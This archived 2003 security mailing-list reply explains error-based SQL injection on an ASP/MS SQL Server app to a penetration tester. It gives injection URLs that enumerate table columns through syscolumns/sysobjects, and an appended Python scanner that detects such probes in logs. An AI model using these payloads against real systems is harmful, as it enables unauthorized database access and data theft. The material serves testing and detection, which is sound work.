WebApp Sec mailing list archives
Re: SQL Injection Basics
From: NetNinja <netninja () hotmail kg>
Date: Sun, 9 Feb 2003 16:21:46 +0600
Hello raul,

Sunday, February 9, 2003, 7:21:47 AM, you wrote:

rjhc> I am pen testing a webapp and am having some problems with SQL injection.
rjhc> The app creates an ODBC error. Is this a guarantee of SQL Injection ?
rjhc> If I use www.victim/test.asp?userid=sfdsd
rjhc> the error is "inncorrect syntax near line 28 of test.asp" (or that's the English translation equiv in my case).

try inputtin single quote " ' " and c if it throws back ODBC error.

rjhc> I know the database is called master, and has a table test. What is the syntax I should use ?

well u can try enumerating columns of ur TEST table like this

www.victim/test.asp?userid=' select convert(int,(select top 1 name from syscolumns where id=(select id from sysobjects where name='TEST')))--

this will try to convert nvarchar value to int and throws back error where u will c first column name of ur TEST table. then u proceed further

www.victim/test.asp?userid=' select convert(int,select top 1 name from syscolumns where id=object_id("TEST") and name>'put here column name returned from previous query')--

once u know column names u can try to retrieve data with UNION or with select convert() something like that...

well u can check out some great papers written by top sql injection ninjas like Kevin Spett, Chris Anley, Cesar Cerrudo and others. interestin to read paypaz. :) check out owasp.org

rjhc> What are the best freeware and open source tools for testing SQL injection ?
rjhc> I tried WPoison which was OK.

heh, haven't heard of that

rjhc> I also tried WebSleuth (which seems to have gone from GPL to closed source commercial btw). Am I right in saying that the SQL plugin has to connect directly to the database to work ? I can only
rjhc> see port 80 so don't think this will work ?
rjhc> Thanks, Raul.
rjhc> Concerned about your privacy? Follow this link to get
rjhc> FREE encrypted email: https://www.hushmail.com/?l=2
rjhc> Big $$$ to be made with the HushMail Affiliate Program:
rjhc> https://www.hushmail.com/about.php?subloc=affiliate&l=427

--
Best regards,
NetNinja
mailto:netninja () hotmail kg
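A defender-side way to spot the probing described in this message in web server logs, added here as an example and not part of the original post. The log layout, signature names, threshold and sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristic signatures (assumed names) for the error-based probing in the thread.
SIGNATURES = {
    "single_quote": re.compile(r"'"),
    "quote_then_sql": re.compile(r"'\s*(?:(?:select|union|or|and)\b|;|--)", re.I),
    "convert_subquery": re.compile(r"convert\s*\(\s*int\s*,\s*\(?\s*select\b", re.I),
    "catalog_lookup": re.compile(r"\b(?:syscolumns|sysobjects)\b|\bobject_id\s*\(", re.I),
    "trailing_comment": re.compile(r"--\s*$"),
}

# Constructed sample lines (simplified layout: date time client method url status).
SAMPLE_LOG = """\
2003-02-09 10:20:01 192.0.2.10 GET /test.asp?userid=42 200
2003-02-09 10:20:09 192.0.2.10 GET /test.asp?name=O%27Brien 200
2003-02-09 10:21:12 192.0.2.77 GET /test.asp?userid=%27 500
2003-02-09 10:21:46 192.0.2.77 GET /test.asp?userid=%27+select+convert(int,(select+top+1+name+from+syscolumns+where+id=(select+id+from+sysobjects+where+name=%27TEST%27)))-- 500
""".splitlines()

def match_signatures(url):
    """Return sorted signature names matched by any decoded query parameter."""
    names = set()
    for _key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        names.update(n for n, rx in SIGNATURES.items() if rx.search(value))
    return sorted(names)

def scan_log(lines, threshold=2):
    """Return alerts for requests whose score reaches the threshold."""
    alerts = []
    for line in lines:
        fields = line.split()
        if len(fields) != 6:
            continue  # skip malformed lines
        _date, _time, client, _method, url, status = fields
        matched = match_signatures(url)
        # A 5xx reply adds one point: the technique relies on the database
        # error text being returned to the client.
        score = len(matched) + (1 if matched and status.startswith("5") else 0)
        if score >= threshold:
            alerts.append({"client": client, "score": score, "signatures": matched})
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

A legitimate value such as O'Brien scores 1 and stays below the threshold, while a lone quote that triggers a server error scores 2 and is reported.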